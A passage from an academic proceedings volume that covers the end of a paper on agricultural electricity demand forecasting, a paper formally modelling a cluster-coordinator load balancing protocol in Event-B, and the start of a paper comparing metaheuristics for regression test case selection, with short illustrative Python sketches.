S11 4990.68773   S12 9854.38792

The two year ahead electricity consumption pattern is represented in Fig. 9, where the blue line denotes the forecasted consumption and the black line represents the actual consumption. The smoothing parameters show that there is no effect of trend and a strong effect of seasonality. The coefficients of the 12 months are shown in Table 3.

4.4 The Experimental Result Using Random Forest Model

In random forest, the most important time lag observations which predict the current value of the response variable are t, t-10, t-9 and t-2. The electricity consumption pattern obtained using random forest is shown in Fig. 10, where the red line denotes the predicted electricity consumption and the blue line represents the actual electricity consumption.

Fig. 10 Actual and forecasted electricity consumption using Random Forest

Table 4 Forecasted electricity consumption from Jan-20 to April-20 using different models
Month Actual ARIMA SARIMA Holt-Winters (ES) Random Forest (RF)
Jan-20 30,245.96 28,266.80 34,850.36 32,506.71 31,198.37
Feb-20 40,777.96 31,655.47 38,691.08 36,581.14 34,794.27
Mar-20 45,793.18 28,248.96 42,704.76 40,196.50 28,699.55
Apr-20 4860.68 17,126.34 4665.74 4381.53 8737.55

Table 5 Comparative analysis of the selected models

Model SSE RMSE RMSPE (%) AIC
ARIMA 2,243,074,512.00 11,676.718 98.149 1235.43
SARIMA 29,062,478.00 2963.610 8.937 797.98
Holt-Winters 63,318,016.00 3683.634 10.104 –
Random Forest 31,012,858.642 5568.919 10.922 –

The comparative analysis of the experimental work is given in Tables 4 and 5. Validation of the work is done for the months Jan-20 to Apr-20; among the four forecasting models (ARIMA, SARIMA, ES and RF), SARIMA outperforms the other forecasting techniques, as shown in Table 4. The sum of squared errors (SSE), root mean square error (RMSE), root mean square percentage error (RMSPE) and AIC values are the least for the SARIMA model, as shown in Table 5. Exponential smoothing is better for monthly forecasting than for quarterly forecasting.
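For completeness, a small Python sketch of the error measures reported in Table 5 is given below; RMSPE = sqrt(mean(((actual − forecast)/actual)²)) × 100 is the usual definition and is assumed here, since the paper does not spell it out. The example values are taken from Table 4.

```python
import numpy as np

def rmse(actual, forecast):
    return np.sqrt(np.mean((actual - forecast) ** 2))

def rmspe(actual, forecast):
    # Root mean square percentage error, in percent (assumed definition).
    return np.sqrt(np.mean(((actual - forecast) / actual) ** 2)) * 100

# Jan-20 to Apr-20 actual values and SARIMA forecasts from Table 4.
actual = np.array([30245.96, 40777.96, 45793.18, 4860.68])
sarima = np.array([34850.36, 38691.08, 42704.76, 4665.74])
print(rmse(actual, sarima), rmspe(actual, sarima))
```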

5 Conclusion and Future Work

Electricity demand forecasting is a crucial aspect of planning and monitoring electricity consumption by the utility in every sector, and if proper utilization of the available resources is done, it benefits the government, consumers, and the utility. Agriculture is one of the sectors which depends on electricity, and there is a need to forecast the demand according to the season/monsoon. In the proposed work, time series-based mid-term load forecasting is performed to determine the month-wise electricity consumption pattern in the agricultural sector. The dataset contains historical electricity consumption data of the agricultural sector, and different types of statistical and machine learning techniques are trained on the dataset to predict the one year ahead electricity consumption in the agricultural sector. ARIMA, seasonal ARIMA, exponential smoothing, and random forest techniques are used to forecast the future electricity consumption pattern. The result shows that SARIMA outperforms the other three models, as it shows less error in terms of RMSE and RMSPE.
To forecast electricity consumption accurately in the agriculture sector, historical data alone is not sufficient; there is also an effect of weather, level of groundwater as well as the type of crops. Thus, in future, regression techniques or intelligent algorithms can be used for forecasting electricity consumption in the agricultural field.

Acknowledgements The work was supported by Genus Power Infrastructures limited and author
would like to thank the FICCI and SERB which provide funds under the Prime Minister’s Fellowship
for Doctoral Research (PMRF). The author is also grateful to Jaipur Vidyut Vitran Nigam Limited
(JVVNL) for their support and providing the original dataset.

References

1. Moulik, T. K., Dholakia, B. H., & Shukla, P. R. (1990). Energy demand forecast for agriculture
in India. Economic and Political Weekly, A165-A176.
2. http://www.mospi.gov.in/sites/default/files/publication_reports/ES_2020_240420m.pdf
3. http://www.cea.nic.in/reports/others/planning/pdm/growth_2019pdf
4. Eskandarnia, E. M., Kareem, S. A., & Al-Ammal, H. M. (2018). A review of smart meter load
forecasting techniques: Scale and horizon. In IEEE conference April.
5. Cai, M., Pipattanasomporn, M., & Rahman, S. (2019). Day-ahead building-level load forecasts
using deep learning vs. traditional time-series techniques. Applied Energy, 236, 1078–1088.
6. Aprillia, H., Yang, H. T., & Huang, C. M. (2020). Statistical Load Forecasting Using Optimal
Quantile Regression Random Forest and Risk Assessment Index. IEEE Transactions on Smart
Grid.
7. Vera, I., & Langlois, L. (2007). Energy indicators for sustainable development. Energy, 32(6),
875–882.
8. Saravanan, S., & Karunanithi, K. (2018). Forecasting of electric energy consumption in Agri-
culture sector of India using ANN Technique. International Journal of Pure and Applied
Mathematics, 119(10), 261–271.
9. Muangprathub, J., Boonnam, N., Kajornkasirat, S., Lekbangpong, N., Wanichsombat, A., &
Nillaor, P. (2019). IoT and agriculture data analysis for smart farm. Computers and Electronics
in Agriculture, 156, 467–474.
10. Kaur, H., & Ahuja, S. (2017). Time series analysis and prediction of electricity consumption of
health care institution using ARIMA model. In Proceedings of Sixth International Conference
on Soft Computing for Problem Solving, pp. 347–358. Springer, Singapore.
11. Panapongpakorn, T., & Banjerdpongchai, D. (2019, January). Short-term load forecast for
energy management systems using time series analysis and neural network method with average
true range. In 2019 First International Symposium on Instrumentation, Control, Artificial
Intelligence, and Robotics (ICA-SYMP), pp. 86–89. IEEE.
12. Katara, S., Faisal, A., & Engmann, G. M. (2014). A time series analysis of electricity demand
in Tamale, Ghana. International Journal of Statistics and Applications, 4(6), 269–275.
13. Moon, J., Kim, Y., Son, M., & Hwang, E. (2018). Hybrid short-term load forecasting scheme
using random forest and multilayer perceptron. Energies, 11(12), 3283.
14. Gardner, E. S., Jr. (2006). Exponential smoothing: The state of the art—Part II. International
Journal of Forecasting, 22(4), 637–666.
15. Moon, J., Kim, J., Kang, P., & Hwang, E. (2020). Solving the cold-start problem in short-term
load forecasting using tree-based methods. Energies, 13(4), 886.
Formal Modelling
of Cluster-Coordinator-Based Load
Balancing Protocol Using Event-B

Shantanu Shukla, Raghuraj Suryavanshi, and Divakar Yadav

Abstract A distributed system is a set of autonomous nodes or sites. Due to uneven distribution of work, some sites may become overloaded and others may be underloaded or idle. Proper load balancing is required for better resource utilization. It will be more effective when sites are arranged in the form of clusters. In the cluster-coordinator-based approach, groups of sites construct clusters, and each cluster will have one coordinator. The coordinator site keeps track of the information of each site, with its load value, in the form of a vector. If any site of a particular cluster transfers load to another site, present in the same or a different cluster, it will inform the coordinator to update its vector value. If none of the sites is available to adjust the load, then the coordinator site must balance the load by transferring it to a different cluster. In this paper, we formalize the cluster-coordinator-based load balancing using Event-B. Event-B is a formal method to mathematically verify the correctness of a protocol in a distributed environment.

Keywords Formal modelling · Formal verification · Event-B · Load balancing · Coordinator

1 Introduction

In the hierarchical distributed system approach, the network is divided into many clusters. Each cluster has a set of sites. Due to uneven distribution of the load, sites may be underloaded or overloaded. In each cluster, there is one coordinator where
S. Shukla (B) · R. Suryavanshi


Pranveer Singh Institute of Technology, Kanpur, India
e-mail: shantanushukla20@hotmail.com
R. Suryavanshi
e-mail: raghuraj.suryavanshi@gmail.com
D. Yadav
Institute of Engineering and Technology, Lucknow, India
e-mail: divakar_yadav@rediffmail.com


all information of every site is stored, which helps in taking decisions in the cluster. The coordinator maintains a vector stamp to store the load information of every site. If any site transfers load to another site in the same cluster, then the corresponding load value will be changed. The coordinator site also decides to transfer load to other clusters when a load transfer request cannot be fulfilled within the cluster. A site contains the load information, and it will be processed according to the requests of the users [1, 2]. If any site is overloaded, the coordinator checks for the presence of an underloaded site in its vector table. If it finds one, then the load transfer will take place in the same cluster and the vector value will be updated. If none of the sites is available for accepting the load because of the threshold, then the coordinator will send the load to the coordinator of another cluster [3–5].
In this paper, formal modelling [6] and verification of load transfer are done using Event-B. Event-B is a formal method which is well suited to specifying the properties of distributed systems. We formalize each step of the modelling with the help of functions, relations and other mathematical objects used in discrete mathematics. The Event-B model is represented by a machine and a context. The context of the model shows the static part, having declarations of sets, constants and axioms, and the machine represents the dynamic part, containing variables, invariants, theorems and events [7–9].
The remainder of this paper is organized as follows: Section 2 briefly outlines Event-B, Sect. 3 describes the cluster-coordinator load balancing protocol, and Sect. 4 presents the formal development of the load balancing protocol. Section 5 concludes the paper.

2 Event-B

Event-B [10–13] is a formal method for modelling and verification of systems. Formal methods are mathematical techniques to specify system behaviour. It is used to formalize and verify the functions of the system. Event-B uses the notations of discrete mathematical logic to specify the properties and functionalities of a system. An Event-B model is represented in terms of variables, invariants, axioms and a set of events. Invariants represent properties of the system which should never be violated during execution. An Event-B model produces proof obligations which should be discharged in order to verify the correctness of the system. Events in a B model represent system behaviour through their guards and lists of actions [14, 15].

3 Cluster-Coordinator Load Balancing Protocol

In the cluster-coordinator-based protocol, all sites are arranged in the form of clusters. A coordinator is designated in each cluster. The coordinator site keeps track of the load value of all sites with the help of a vector. When a load is applied on any site, its load value will be updated and the vector of the coordinator will also be updated. The length of the vector covers the information of all sites. The vector load of the cluster helps to know the load status of each site. When the load value of any site is more than the threshold value, it is known as an overloaded site. Either the load of this overloaded site may be adjusted in the same cluster (when sites are available in the same cluster to take the extra load), or it will be transferred to a different cluster (due to the unavailability of adjusting sites in the same cluster, as transferring the extra load may cause them to be overloaded).
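Before the formal development, the following Python sketch illustrates the informal behaviour just described (coordinator vector, threshold check, intra- and inter-cluster transfer); the class and method names, the threshold value and the transfer policy details are assumptions made for illustration, not part of the Event-B model itself.

```python
THRESHOLD = 100  # assumed load threshold

class Coordinator:
    def __init__(self, sites):
        self.vlsc = {s: 0 for s in sites}  # vector load stamp: site -> load value

    def update(self, site, load):
        self.vlsc[site] = load

    def receive(self, load):
        # Assign the incoming load to the least loaded site of this cluster (assumption).
        site = min(self.vlsc, key=self.vlsc.get)
        self.update(site, self.vlsc[site] + load)

    def balance(self, overloaded_site, other_coordinators):
        """Move excess load inside the cluster if possible, else hand it to another coordinator."""
        excess = self.vlsc[overloaded_site] - THRESHOLD
        for site, load in self.vlsc.items():
            if site != overloaded_site and load + excess <= THRESHOLD:
                self.update(site, load + excess)            # intra-cluster transfer
                self.update(overloaded_site, THRESHOLD)
                return site
        other_coordinators[0].receive(excess)               # inter-cluster transfer (simplistic)
        self.update(overloaded_site, THRESHOLD)
        return other_coordinators[0]
```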

4 Formal Development of Load Balancing Protocol

In our system model, SITE and CLUSTER are declared as carrier sets representing the set of sites and clusters, respectively. In the static part of the model, we declare clusterstatus as an enumerated set having the values underloaded and overloaded. The set loadtrsstatus is also an enumerated set having the values disable or enable. The discussion of the variables and invariants (see Fig. 1) is as follows:
(a) The variable clustergroup is defined as a power set of SITE.
(b) The variable clustersitestatus specifies that the status of a cluster site is either underloaded or overloaded.
(c) The variable loadval represents that the load value of every site will be a natural number.
(d) Any site can work as a coordinator. The variable coordinator is a subset of the SITE set.
(e) The variable vlsc shows the vector load stamp of a coordinator. Whenever the load value of any site is increased or decreased, the vector load stamp of the coordinator in the cluster will be updated with the latest load value of the site. It is modelled as:

vlsc ∈ SITE → (SITE → ℕ)

Variables: clustergroup, clustersitestatus, loadval, coordinator, vlsc, clustercoordinator, loadstatus, trloadval

inv1 : clustergroup ⊆ ℙ(SITE)
inv2 : clustersitestatus ∈ SITE → clusterstatus
inv3 : loadval ∈ SITE → ℕ
inv4 : coordinator ⊆ SITE
inv5 : vlsc ∈ SITE → (SITE → ℕ)
inv6 : clustercoordinator ∈ clustergroup → SITE
inv7 : loadstatus ∈ SITE → loadtrsstatus
inv8 : trloadval ∈ SITE → ℕ

Fig. 1 Variables and invariants of the Event-B model



The vector vlsc(Si)(Sj) represents the load value of site Sj known to coordinator Si.
(f) The variable clustercoordinator is a total function from clustergroup to SITE. It specifies the coordinator site of each cluster. A mapping of the form cc ↦ ss ∈ clustercoordinator specifies that site ss is the coordinator of cluster cc.
(g) The variable loadstatus specifies the load transfer status of a site. If a site is ready to transfer the load or to receive the load, its status will be enabled; otherwise, it will be disabled.
Description of Events:
(A) Creating Group of Clusters: This event models creation of cluster which
contains set of sites (see Fig. 2). The guard grd1 shows that cc is group of
SITE. This group is not present in existing cluster group as ensured by guard
grd2. This event adds cluster cc to cluster group.
(B) Deciding Coordinator in Cluster: This event specifies the selection of coor-
dinator in each cluster (see Fig. 3). In this event, we choose the coordinator
and ensure that every cluster must have one coordinator. Site ss is in cluster
cc (grd3), and it has not been chosen as coordinator yet is specified as grd4.
Due to the occurrence of this event, site ss is selected as coordinator of cluster
group cc (act1).

Fig. 2 Event of the created cluster group

Create clustergroup
ANY cc
WHERE
grd1 : cc ∈ ℙ(SITE)
grd2 : cc ∉ clustergroup
THEN
act1 : clustergroup ≔ clustergroup ∪ {cc}
END

Fig. 3 Choose the coordinator

Decide coordinator in cluster
ANY cc, ss
WHERE
grd1 : cc ∈ clustergroup
grd2 : ss ∈ SITE
grd3 : ss ∈ cc
grd4 : (cc ↦ ss) ∉ clustercoordinator
THEN
act1 : clustercoordinator(cc) ≔ ss
END

Fig. 4 Load submission

(C) Load Submission: When any new site is joined in the cluster, we check the
load value. Load value is a natural number that is either greater than or less
than the threshold. Every site in the cluster maintains a load value, and the
coordinator site also maintains a vector load stamp. Load submission event is
shown in Fig. 4. Load ld is a natural number which is defined by guard (grd5).
The guard grd3 ensures that site ss is coordinator of cluster cc. The guards
grd6 and grd7 specify that site ss1 is from cluster cc. The load value of site ss1
is increased by load ld as shown in act1. The vector load stamp of coordinator
ss will be updated as increased load value of site ss1 (act2).
(D) Checking Load Status of Site: This event specifies the status of site as under-
loaded or overloaded (Fig. 5). If load value of site is less than threshold, we
consider that site as underloaded, and if the load is greater than threshold then
it is known as overloaded. In Fig. 5, we check the load status, and site ss1 is
SITE and belongs to the domain of load value (grd1 and grd2). If the load
value of ss1 is less than the threshold (grd3) of Fig. 5a, then status of clustersite
ss1 is underloaded (act1). If the load value of ss1 is greater than the threshold
(grd3) of Fig. 5b, then the clustersite status of ss1 is overloaded (act1).
(E) Sending Load to Coordinator Site: In this event, if any site is overloaded, load
will be sent to coordinator site and load vector value vlsc will be updated
(Fig. 6). The load value of ss1 is greater than the threshold, and the load status
of ss1 is enabled for sending the load as ensured by guards grd10 and grd11,
respectively. In the action, we ensure that site ss accepts load by enabling the
load status. Load value of ss1 is decreased by load ld (act2). The load vector
of coordinator site ss will be updated as load value of site ss1.
(F) Receiving Load From Overloaded Site: This event models transferring of load
to coordinator site (Fig. 7). Load ld is the load value of site ss1, and it is greater
than threshold as ensured by the guard (grd8 and 9). The load status of site ss

Check the load status (underloaded)
ANY ss1
WHERE
grd1 : ss1 ∈ SITE
grd2 : ss1 ∈ dom(loadval)
grd3 : loadval(ss1) ≤ threshold
THEN
act1 : clustersitestatus(ss1) ≔ underloaded
END
(a)

Check the load status of cluster (overloaded)
ANY ss1
WHERE
grd1 : ss1 ∈ SITE
grd2 : ss1 ∈ dom(loadval)
grd3 : loadval(ss1) > threshold
THEN
act1 : clustersitestatus(ss1) ≔ overloaded
END
(b)

Fig. 5 Checking load status of site

is enabled (grd10). If all the guards are true, then actions would be performed.
Load value ld is added to site ss (act1), and vector load stamp of coordinator
will be updated as increased value of load ld (act2).
(G) Transferring load Within Cluster: After receiving the load from the overloaded
site, the coordinator site searches the underloaded site which can take load and
balance all the sites in the cluster (Fig. 8). The guards grd4 and grd5 ensure
that coordinator site ss is overloaded. The guards grd9 and grd10 specify that
underloaded site s is present in cluster cc. Due to the occurrence of this event,
load ld is decreased from site ss (act1) and the vector load stamp of coordinator site
ss is updated with the decreased value of load ld (act2). The action act3 specifies
that the transfer load value of site ss is set to ld.
(H) Receiving of Load by Underloaded Site: This event models the receiving of
load from coordinator site (Fig. 9). During receiving of load, it should be
ensured that load value of underloaded site should not be greater than the
threshold value. The guards grd7 and grd8 specify that status of site s and ss
is underloaded and overloaded, respectively. Site ss is the coordinator site of
cluster cc (grd9). The guard grd11 specifies that after receiving load ld from
coordinator site ss, load value of site s is less than threshold value. Due to
the occurrence of this event, load value of site s is increased by ld (act1) and

Fig. 6 Sending load to coordinator site

Fig. 7 Receiving load from overloaded site



Fig. 8 Transferring load within the cluster

Fig. 9 Receiving of load by underloaded site



Fig. 10 Transferring load from coordinator to other cluster

vector load of coordinator site ss will be updated as increased value of load of


site s.
(I) Transferring Load from Coordinator to Other Cluster: This event models the
transferring of load from coordinator to other underloaded cluster (see Fig. 10).
The guards grd2, grd3 and grd4 ensure that ss1 is coordinator of cluster cc.
Similarly, guards grd6, grd7 and grd8 ensure that ss2 is coordinator site of
cluster cc2. The status of sites ss1 and ss2 is overloaded (grd9) and underloaded
(grd10), respectively. The guard grd15 ensures that after taking load ld from
ss1, load value of ss2 should be less than threshold. This event updates the
load value and vector load of coordinator ss1 through actions act1 and act2.
The action act3 records load ld as transferred load value of coordinator site
ss1.
(J) Receiving Load From Overloaded Cluster: This event models receiving of
load from overloaded cluster (Fig. 11). The guards grd2, grd3, grd4 and grd5
specify that ss1 is overloaded coordinator site of cluster cc. Similarly, guards
grd7, grd8, grd9 and grd10 specify that ss2 is underloaded site of cluster cc2.
The guard grd13 ensures that after taking load ld, load value of site ss2 should
not cross threshold value. Due to the occurrence of this event, load ld will be
transferred to ss2 and its load value will be updated (act1). The vector load

Fig. 11 Receiving load from overloaded cluster

value of coordinator ss2 will also be updated as increased load value of ss2
(act2).

5 Conclusion

In the cluster-coordinator (C-C)-based approach, sites are arranged in the form of
clusters. Each site is assigned a load value, which indicates the number of tasks
submitted at that site. Due to uneven load, a few sites may become overloaded while
others remain underloaded. Initially, load from a heavily loaded site is transferred to
an underloaded site within the same cluster. If such a transfer is not possible in the
same cluster owing to the unavailability of an underloaded node, the load is transferred
to a site present in a different cluster. In order to communicate with another cluster,
a coordinator site is selected from each cluster. We have used Event-B as the formal
method for verification of our model, together with the RODIN platform, which provides
an environment to write the specification and discharge the proof obligations generated
by the model. The proof methods verify the well-definedness conditions of events and
invariants. In this model, ninety-three proof obligations are generated in total, out of
which sixty-nine were discharged automatically while twenty-four were discharged manually.

Acknowledgements This work is done under the Distributed Load Balancing and System Recovery
(DLSR) project governed by Uttar Pradesh Council of Science and Technology and supported by
PSIT College Kanpur.

References

1. Singhal, M., & Shivratri, N. G. (2005). Advanced Concepts in Operating Systems. India: Tata
Mc- GrawHill Book Company.
2. Alakeel, A. M. (2010). A guide to dynamic load balancing in distributed computer system.
International Journal of Computer Science and Network Security, 10(6).
3. Benmohammed Mahieddine, K. (1991). An evaluation of load balancing algorithm for
distributed systems. School of Computer Science.
4. Yank, J., Ling, L., & Li, H. (2016). A hierarchical load balancing strategy considering communication delay overhead for large distributed computing systems. Mathematical Problems in Engineering, Article ID 5641831.
5. Alakeel, A. M. (2016). Application of fuzzy logic in load balancing of homogeneous distributed
system. International Journal of Computer Science & Security (IJCSS), 10(3).
6. Elsayed, E., El Sharawy, G. & El- Sharawy, E. (2013) Integration of automatic provers in
event-B patterns. International Journal of Software engineering & Application (IJSEA), 4(1).
7. Su, W., Abrial, J. R., & Zhu, H. (2014). Formalizing hybrid systems with Event-B and the Rodin platform. Science of Computer Programming, 164–203.
8. Abrial, J. R. (1996). The B Book: Assigning programs to meaning. New York, NY, USA:
Cambridge University Press.
9. Zou, S. R., & Chen, L. (2018). Comparison of Event-B and B method: Application in immune system. Yangzhou University College of Information Engineering, Jiangsu, China.
10. Abrial, J.-R. (2010). Modelling in Event-B: System and Software Engineering (1st ed.). New
York, NY, USA: Cambridge University Press.
11. Rodin Project, RODIN – Rigorous Open Development Environment for Complex Systems,
2004–2007. <http://rodin.cs.ncl.ac.uk/>.
12. Butler, M.: An Approach to Design of Distributed Systems with B AMN. In: Proc. 10th Int.
Conf. of Z Users: The Z Formal Specification Notation (ZUM), LNCS1212, pp. 223–241,
(1997).
13. Butler M. and Walden, M.: Distributed System Development in B. In: Proc. of 1st Conf. in B
Method, Nantes, pp. 155–168, (1996).
14. Suryavanshi, R., & Yadav, D. (2013). Modelling of distributed mutual exclusion system using Event-B. In J. Zizka (Ed.), CCSIT, SIPP, AISC, PDCTA – 2013 (pp. 477–491). CS & IT-CSCP.
15. Hoang, T. S. An introduction to the Event-B modelling method. In A. Romanovsky & M. Thomas (Eds.), Industrial Deployment of System Engineering Methods (pp. 211–236). Springer.
Regression Test Case Selection:
A Comparative Analysis of Metaheuristic
Algorithms

Abhishek Singh Verma , Ankur Choudhary , and Shailesh Tiwari

Abstract Regression testing is the activity of finding bugs in the modified parts of the
software so that software versions can be released on time and further risks avoided.
Retesting all existing test cases, including obsolete and redundant ones, increases the cost
and effort of the overall process. In order to reduce this cost and time, optimization
algorithms are playing a vital role. This paper focuses on the performance analysis of
three recent metaheuristic algorithms: Cuckoo Search, Crow Search Algorithm, and
Harris Hawks Optimization to solve the RTCS problem for selecting the test cases.
Fault coverage and execution time parameters have been selected for performance
evaluation. The experiments are performed and analyzed on standard SIR repository.
The results and statistical tests show that Cuckoo Search and Crow Search Algorithm
significantly give better results for different parameters of RTCS problem than Harris
Hawks Optimization (HHO). The Cuckoo Search outperformed on fault coverage,
and Crow Search Algorithm outperformed on time parameter.

Keywords Regression testing · Optimization · Meta-Heuristics · Regression test case selection · Cuckoo search · Crow search algorithm · HHO

1 Introduction

The growth and success of any software industry are based on fulfilling the customer's
requirements and delivering a quality product within the specified time period and
budget. It has therefore become difficult for industries to keep up with ever-changing
customer requirements and technology upgradation [1]. Testing is one of the essen-
tial phases of SDLC. Moreover, inefficient testing could lead to major economic

A. S. Verma (B)
Dr. A.P.J. Abdul Kalam Technical University, Lucknow, India
A. S. Verma · A. Choudhary
Sharda University, Greater Noida, India
S. Tiwari
ABES Engineering College, Ghaziabad, India


losses during the development of any software. There exist different software testing
techniques: Regression testing is one of them. Regression testing plays an important
role in maintenance phase to test the quality of software in every updation cycle.
The test suite size increases as new test cases are added every time after addition
of new functionalities in the existing code. Rerunning the entire test suite becomes time
consuming; sometimes it may take a week or more to perform regression testing [2].
In addition, regression testing generally consumes lots of computing resources [3].
Regression Test Case Selection (RTCS) [4–7] aims to select and run only those test
cases that are affected by the code change. RTCS is one of the most explored approach
of test suite optimization to reduce the efforts and cost of regression testing process.
RTCS is considered as an N-P hard problem. Various artificial intelligence algo-
rithms have already been used to solve this complex and multi-objective problem in a
shorter span of time [8–11]. Being a multi-objective problem, the use of metaheuristic
algorithms to solve RTCS is the most appropriate choice.
This paper focuses on the comparative analysis of three recent metaheuristic
algorithms: Cuckoo Search, Crow Search Algorithm, and Harris Hawks Optimiza-
tion to evaluate the performance of RTCS problem. An empirical study on twelve
subject programs retrieved from Software-artifact Infrastructure Repository (SIR)
[12]. Results are also compared with these adopted metaheuristic algorithms to
check which algorithm performs better and provides most optimized results to cover
maximum number of faults in minimum execution time.
Rest of the paper is organized as follows: Sect. 2 discusses the related work carried
out by previous researchers in the domain of RTCS. Section 3 briefly discusses the
problem statement. Section 4 gives an overview of CS, CSA, and HHO algorithms,
respectively. Section 5 presents experimental design and results obtained. Finally,
Sect. 6 concludes the paper with future scope.

2 Related Work

Nature is rich in resources, and humans draw inspiration from natural phenomena.
Researchers take inspiration from these phenomena to solve complex engineering problems. The
literature revealed that nature-inspired approaches have also been utilized to solve
Regression Test Case Selection (RTCS) problem. Yoo et al. presented an empirical
study to solve the problem of RTCS with the help of Pareto efficient multi-objective
genetic algorithm [13]. Maia et al. proposed a multi-objective formulation to solve
RTCS problem and explain how to optimize results of RTCS problem with the help
of multi-objective formulation [14]. De Souza et al. improved a binary multi-objective
PSO method with the catfish effect and utilized this improved approach for structural
and functional test case selection [15]. Narciso et al. presented a systematic review
on test case selection approaches and identified 18 different methods analyzed from
various research papers [16]. Panichella et al. proposed a novel diver-
sity preserving technique used to solve multi-criteria RTCS problems and improve
the performance of multi-objective GA named as Diversity based Genetic Algorithm

(DIV-GA) [17]. Rosero et al. presented an effective survey on regression testing


techniques and identified 31 regression testing techniques published in last 15 years
[18]. Hafez et al. proposed a potential fault cache technique for regression test selec-
tion which performs continuous testing with minimal efforts and the results signify
that this technique is more stable and achieves higher cache hit rates [19]. Kazmi
et al. presented a systematic literature review on effective RTCS techniques and
performed 47 empirical studies considering various parameters [20]. Choudhary
et al. proposed a Pareto-based harmony search optimization algorithm for RTCS
problem and the performance statistically evaluated using two metaheuristic algo-
rithms: Bat and Cuckoo Search [21]. Bajaj et al. presented a literature survey on
various nature-inspired optimization algorithms which have been utilized to solve
regression testing problems and analyzed that GA-based approaches performed better
than other approaches [22]. Agrawal et al. have performed a comprehensive comparison
of ACO and Hybrid PSO metaheuristic algorithms to analyze their performance on the
RTCS problem considering execution time and fault coverage as quality parame-
ters [23]. Correia et al. have developed a multi-objective test selection tool (MOTSD)
to reduce the cost of selected subset of tests [24]. Gladston et al. proposed a frame-
work for test case selection using Improvised ACO and rough sets which reduces the
test suite size as well as the cost of the whole process [25]. Agrawal et al. proposed
a safe RTCS approach using a Hybrid WOA and evaluated the results with BA and
ACO-based RTCS approaches and found that HWOA performance is better than
with compared metaheuristic algorithms [26].
The above literature reveals the importance of nature-inspired approach for RTCS
problems. In this paper, the performance of Cuckoo Search, Crow Search Algorithm,
and Harris Hawks Optimization has been utilized to solve RTCS problems. The author
has considered two main parameters in this paper such as total fault coverage and
execution time.

3 Problem Statement: Regression Test Case Selection

Existing large test suites contain some obsolete and redundant test cases, as two or more
test cases target the same faults or the same requirements, which increases the size of
the test suite. So, it is recommended to minimize the size of the test suite [15]. In
this paper, the author has considered two test adequacy criteria: execution time and
total fault coverage of test cases.
Given: Suppose an existing software program is denoted by SP and a modified version
of this program is denoted by SP'. The test suite of program SP is represented by
TS = {tc1, tc2, tc3, ..., tcm}. Let n ≤ m be a given number, where n represents the
size of the optimal test suite and m represents the total number of test cases in TS.
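
For illustration, a candidate selection can be encoded as a binary vector over the test suite, with a fitness that rewards covered faults and penalizes execution time; the fault matrix, times and weighting below are invented, not taken from the SIR programs used later.

# Toy encoding of an RTCS candidate and a simple two-objective fitness (illustrative only).
import random

faults = [{0, 2}, {1}, {0, 1, 3}, {2, 3}]      # faults detected by tc1..tc4 (invented)
exec_time = [3.0, 1.0, 4.0, 2.0]               # execution time of tc1..tc4 (invented)

def fitness(selection):
    """Reward the number of covered faults, penalize total execution time of the subset."""
    chosen = [faults[i] for i, s in enumerate(selection) if s]
    covered = set().union(*chosen) if chosen else set()
    time = sum(t for t, s in zip(exec_time, selection) if s)
    return len(covered) - 0.1 * time

candidate = [random.randint(0, 1) for _ in faults]
print(candidate, fitness(candidate))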

4 Discussion: Metaheuristic Algorithms Used

4.1 Cuckoo Search Algorithm

Cuckoo Search (CS) was proposed in 2009 by Xin-She Yang and Suash Deb [27]. The
algorithm mimics the brood-parasitic behavior of the cuckoo bird and utilizes the Lévy
flight technique. A cuckoo lays its eggs in another host bird's nest and may throw out
the host bird's own eggs. Some host birds tolerate the cuckoo's egg, while others
recognize the intruder; in the latter case, the host bird throws the cuckoo's eggs out
of the nest.
The Cuckoo Search (CS) algorithm works on three basic rules (a simplified sketch of the
resulting search step is given after the rules):
1. Each cuckoo lays one egg at a time and places it in a randomly chosen nest.
2. The best nests with the highest quality of eggs are carried over to the next iteration.
3. The number of host nests is fixed, and the host bird can identify the cuckoo's egg
with a probability p ∈ [0, 1] [28].
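
Under these rules, one common way of realizing the CS search step on a continuous objective is sketched below: each nest is perturbed by a Lévy-flight step and a fraction pa of the worst nests is abandoned. The Mantegna-style step, the sphere objective and all constants are standard illustrative choices, not parameters reported in this paper.

# Illustrative Cuckoo Search loop with a simple Mantegna-style Levy flight.
import math, random

def levy_step(beta=1.5):
    sigma = (math.gamma(1 + beta) * math.sin(math.pi * beta / 2) /
             (math.gamma((1 + beta) / 2) * beta * 2 ** ((beta - 1) / 2))) ** (1 / beta)
    u, v = random.gauss(0, sigma), random.gauss(0, 1)
    return u / abs(v) ** (1 / beta)

def cuckoo_search(obj, dim=2, n_nests=30, pa=0.1, iters=200):
    nests = [[random.uniform(-5, 5) for _ in range(dim)] for _ in range(n_nests)]
    best = min(nests, key=obj)
    for _ in range(iters):
        for i, nest in enumerate(nests):
            # Lay a new egg via a Levy flight biased towards the current best nest.
            new = [x + 0.01 * levy_step() * (x - b) for x, b in zip(nest, best)]
            if obj(new) < obj(nest):
                nests[i] = new
        nests.sort(key=obj)                       # best nests first
        for i in range(int(pa * n_nests)):        # abandon a fraction pa of the worst nests
            nests[-(i + 1)] = [random.uniform(-5, 5) for _ in range(dim)]
        best = min(nests + [best], key=obj)
    return best

print(cuckoo_search(lambda x: sum(v * v for v in x)))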

4.2 Crow Search Algorithm

The Crow Search Algorithm (CSA) was proposed by Askarzadeh in 2016 [29]. CSA is
inspired by the foraging behavior of crow flocks: each crow hides its surplus food in a
hiding place and keeps it from the other crows in the flock [30].
The implementation of the Crow Search Algorithm (CSA) is based on the concepts
mentioned in the following points (a simplified sketch of the position update follows the list):
• Crows generally live in flocks.
• Crows memorize their food hiding locations.
• Crows follow other crows in the flock to steal food.
• Crows are wary of thievery and protect their caches with a certain awareness probability.
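
The sketch below is a compact, illustrative rendering of the resulting position update; the awareness probability and flight length mirror the values later listed in Table 1, while the objective, bounds and remaining details are our own choices.

# Illustrative Crow Search Algorithm: follow a random crow's memory or jump randomly.
import random

def crow_search(obj, dim=2, n_crows=30, ap=0.1, fl=2.0, iters=500):
    crows = [[random.uniform(-5, 5) for _ in range(dim)] for _ in range(n_crows)]
    memory = [c[:] for c in crows]               # each crow's remembered hiding place
    for _ in range(iters):
        for i in range(n_crows):
            j = random.randrange(n_crows)        # crow i follows a randomly chosen crow j
            if random.random() >= ap:
                # Crow j is unaware: crow i moves towards crow j's hiding place.
                crows[i] = [x + random.random() * fl * (m - x)
                            for x, m in zip(crows[i], memory[j])]
            else:
                # Crow j is aware: it fools the follower, who ends up at a random position.
                crows[i] = [random.uniform(-5, 5) for _ in range(dim)]
            if obj(crows[i]) < obj(memory[i]):   # update memory when the new place is better
                memory[i] = crows[i][:]
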